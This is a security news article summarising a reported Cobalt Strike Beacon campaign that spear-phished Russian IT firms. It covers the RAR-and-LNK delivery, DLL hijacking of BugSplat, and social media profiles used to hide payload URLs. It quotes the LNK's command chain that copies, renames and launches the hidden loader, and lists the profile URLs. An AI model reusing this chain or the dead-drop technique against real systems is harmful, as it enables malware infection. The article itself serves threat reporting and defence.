Hackers Delivering Cobalt Strike Beacon Leveraging GitHub and Social Media

A sophisticated cyberattack campaign targeting the Russian IT industry has emerged, demonstrating how threat actors are increasingly leveraging legitimate online platforms to distribute the notorious Cobalt Strike Beacon malware.

The campaign, which peaked during November and December 2024 and continued through April 2025, represents a significant evolution in attack methodology, utilizing popular social media platforms and code repositories as command-and-control infrastructure.

The attackers employed an intricate multi-stage delivery mechanism that begins with spear-phishing emails disguised as legitimate communications from major state-owned companies, particularly within the oil and gas sector.

These carefully crafted messages contained malicious RAR archives designed to evade traditional security detection systems.

The campaign’s scope extended beyond Russia, with evidence of malicious activity detected in China, Japan, Malaysia, and Peru, primarily targeting large and medium-sized businesses.

What sets this campaign apart is its innovative use of social media platforms and popular websites as staging grounds for malicious payloads.

Securelist analysts identified that the attackers established fake profiles on GitHub, Microsoft Learn Challenge, Quora, and Russian-language social networks to host encoded payload information.

This technique allows the malware to blend seamlessly with legitimate web traffic, making detection significantly more challenging for traditional security solutions.

The attack’s sophistication extends to its technical implementation, employing advanced evasion techniques including DLL hijacking and dynamic API resolution.

The malware specifically targets the legitimate BugSplat crash reporting utility, exploiting it through a technique known as DLL substitution to load malicious code while maintaining the appearance of normal system operations.

Technical Infection Mechanism

The infection chain begins when victims open the malicious RAR archive, which contains a carefully structured directory hierarchy designed to deceive users.

The archive includes legitimate-looking PDF files alongside a malicious LNK file named “Требования.lnk” that serves as the initial execution vector.

Upon execution, the LNK file performs a series of file operations through the following command sequence:-

%cd% /c echo F | xcopy /h /y %cd%ТребованияТребования %public%Downloads
& start %cd%Требования
& ren %public%DownloadsCompany.pdf nau.exe
& ren %public%DownloadsRequirements.pdf BugSplatRc64.dll
& %public%Downloadsnau.exe

This sequence copies hidden files to the Downloads directory, renames them to appear as legitimate executables, and launches the primary payload.

The malware exploits BugSplat’s crash reporting utility by hijacking its required DLL, forcing it to load malicious code instead of legitimate functionality.

The malware then queries social media profiles containing base64-encoded, XOR-encrypted data that reveals additional payload URLs.

Analysis revealed communication with profiles on https://techcommunity.microsoft.com/t5/user/viewprofilepage/user-id/2631 and https://www.quora.com/profile/Marieformach, with the extracted data pointing to GitHub repositories hosting the final Cobalt Strike payload.

This campaign demonstrates the evolving threat landscape where attackers exploit the trust inherent in popular platforms to establish resilient command-and-control infrastructure, highlighting the need for enhanced detection capabilities that can identify malicious activities across legitimate web services.

Integrate ANY.RUN TI Lookup with your SIEM or SOAR To Analyses Advanced Threats -> Try 50 Free Trial Searches